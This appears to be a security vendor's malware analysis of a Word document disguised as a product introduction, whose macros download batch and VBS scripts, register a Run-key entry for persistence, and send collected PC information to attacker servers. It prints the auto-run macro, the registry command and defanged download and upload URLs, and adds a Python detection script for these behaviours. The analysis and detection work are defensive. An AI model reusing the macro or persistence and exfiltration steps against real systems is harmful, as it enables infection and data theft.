Malicious Word Files Disguised as Product Introduction

The ASEC analysis team has discovered a Word document of the same type as the one introduced in the post <Word File Disguised as a Design Modification Request for Information Theft>, uploaded in December last year. The title of the document identified in this case is ‘Product Introduction.doc’. Given that the document includes descriptions of certain products, the attacker likely targeted companies in the distribution and shopping sectors.

The document contains the same image as the previous malicious document, prompting users to enable and run the macro.

Figure 1. Inside Product Introduction.doc

The properties of the document (Created, Author, and Last Modified By) are the same as those of ‘Design Modification Request.doc’. It seems that the attacker is reusing the same file after editing it.

Figure 2. Document properties (left: Design Modification Request.doc / right: Product Introduction.doc)

The document contains a malicious VBA macro. When the document is opened with macros enabled, the malicious code runs automatically through the Document_Open() function. The macro code is slightly more obfuscated than before and downloads additional files from hxxp://manage-box.com/ord03 or /doc03.

Figure 3. Part of VBA macro code included in the Word document

The following files are downloaded by the VBA macro. The downloaded file setup.cab contains a total of 5 scripts (download.vbs, error.bat, no4.bat, start.vbs, and upload.vbs).

| Download URL | Save path and file name |
| --- | --- |
| hxxp://manage-box[.]com/ord03/no03.txt | C:\Users\Public\Documents\no1.bat |
| hxxp://manage-box[.]com/ord03/vbs03.txt | C:\Users\Public\Documents\setup.cab |
| hxxp://manage-box[.]com/doc03/temp1403.doc | C:\Users\Public\Documents\temp.doc |

Table 1. Download URL and save path

The macro then opens the downloaded file temp.doc. This Word document is disguised as a document from a certain company and contains information about particular products.

Figure 4. Inside temp.doc file

The temp.doc document also has the same properties (Created, Author, and Last Modified By) as those from the Design Modification Request.doc file.

Figure 5. Document properties (left: temp.doc downloaded by Design Modification Request.doc / right: temp.doc downloaded by Product Introduction.doc)

The temp.doc document also harbors a VBA macro that runs the no1.bat file that was downloaded earlier.

' Win32 API import used to launch a program (nCmdShow = 0 hides the window)
Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal nCmdShow As Long _
) As Long

' Runs automatically when the document is opened with macros enabled
Sub Document_Open()
    ' Executes the batch file downloaded earlier by Product Introduction.doc
    WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub

The no1.bat file could not be obtained at the time of analysis. However, since the functionality of each script is identical to that described in the earlier blog post, the file most likely runs error.bat as in the previous case. The table below shows the key behaviors of each script file.

| Filename | Key behaviors |
| --- | --- |
| error.bat | Registers start.vbs in the registry; runs no4.bat; downloads additional files |
| start.vbs | Runs error.bat |
| no4.bat | Collects and sends information |
| download.vbs | Performs download features |
| upload.vbs | Performs upload features |

Table 2. Script names and their key behaviors

The following command is executed when the error.bat file runs, registering start.vbs under the Run key so that it is launched at every logon.

  • "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs"

Afterward, error.bat runs no4.bat and checks for the existence of certain files. It then downloads additional files from hxxp://safemaners.com/dow11/%COMPUTERNAME%.txt. The no4.bat file collects information about the user's PC as shown below and sends it to hxxp://safemaners[.]com/upl11/upload.php.
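To hunt for the two host-side behaviors described above, the Run key entry that launches start.vbs and the Word macro that runs a batch file through WinExec, the following Python is an added example (not AhnLab's code) that applies two rules to constructed Sysmon-style events. The field names (TargetObject, Details, ParentImage, CommandLine) follow Sysmon Event ID 13 and Event ID 1; the sample values are made up.

```python
import re

# Added example, not AhnLab's code: hunts constructed Sysmon-style events for the
# Run-key script persistence and Office-launched .bat described in this post.
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
SCRIPT_RE = re.compile(r"\.(vbs|bat|cmd|js|wsf)\b", re.I)
PUBLIC_DIR_RE = re.compile(r"C:\\Users\\Public\\|\\AppData\\Local\\Temp\\", re.I)
OFFICE_IMAGES = ("winword.exe", "excel.exe", "powerpnt.exe")

def suspicious_run_value(event):
    """Event ID 13: Run-key value whose data is a script in a public/temp folder."""
    target, details = event.get("TargetObject", ""), event.get("Details", "")
    return bool(RUN_KEY_RE.search(target) and SCRIPT_RE.search(details)
                and PUBLIC_DIR_RE.search(details))

def office_spawns_script(event):
    """Event ID 1: Office parent launching a script from a public/temp folder."""
    parent, cmd = event.get("ParentImage", "").lower(), event.get("CommandLine", "")
    return parent.endswith(OFFICE_IMAGES) and bool(
        SCRIPT_RE.search(cmd) and PUBLIC_DIR_RE.search(cmd))

def hunt(events):
    """Return (RecordId, rule name) for each event that matches a rule."""
    hits = []
    for ev in events:
        if ev.get("EventID") == 13 and suspicious_run_value(ev):
            hits.append((ev["RecordId"], "run_key_script_persistence"))
        elif ev.get("EventID") == 1 and office_spawns_script(ev):
            hits.append((ev["RecordId"], "office_launches_public_script"))
    return hits

# Constructed sample events (field names follow Sysmon; values are made up).
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\svchostno2",
     "Details": r"C:\Users\Public\Documents\start.vbs"},
    {"RecordId": 2, "EventID": 13,  # benign autorun from Program Files
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
    {"RecordId": 3, "EventID": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c C:\Users\Public\Documents\no1.bat"},
    {"RecordId": 4, "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Users\alice\Desktop\build.bat"},  # benign user-run batch
]

if __name__ == "__main__":
    for record_id, rule in hunt(SAMPLE_EVENTS):
        print(f"record {record_id}: {rule}")
```

The two benign records show the rules ignoring an autorun from Program Files and a batch file a user started from Explorer.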

| Collected items | Saved file name |
| --- | --- |
| C:\Users\%username%\downloads\ list | %~dp0\cuserdown.txt |
| C:\Users\%username%\documents\ list | %~dp0\cuserdocu.txt |
| C:\Users\%username%\desktop\ list | %~dp0\cuserdesk.txt |
| C:\Program Files\ list | %~dp0\cprog.txt |
| IP information | %~dp0\ipinfo.txt |
| tasklist | %~dp0\tsklt.txt |
| systeminfo | %~dp0\systeminfo.txt |

Table 3. Collected items and saved file names

Currently, accessing the malicious URLs (manage-box[.]com and safemaners[.]com) found in the Word document and script files redirects the user to mail.naver.com. The attacker appears to be masking the sites so that they look harmless to users.

Since malicious Word documents carrying distribution and shopping content, rather than North Korea-related materials, have now been confirmed, Korean users, whom the attacker appears to be targeting, are advised to be cautious. Users should refrain from opening attachments in emails from unknown senders and should verify the sender even when the content appears relevant to their situation.

[V3 Detection]

  • Downloader/DOC.Generic
  • Trojan/DOC.Agent
  • Trojan/VBS.Runner
  • Trojan/BAT.Agent
  • Downloader/BAT.Generic

[Relevant IOC Info]


Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
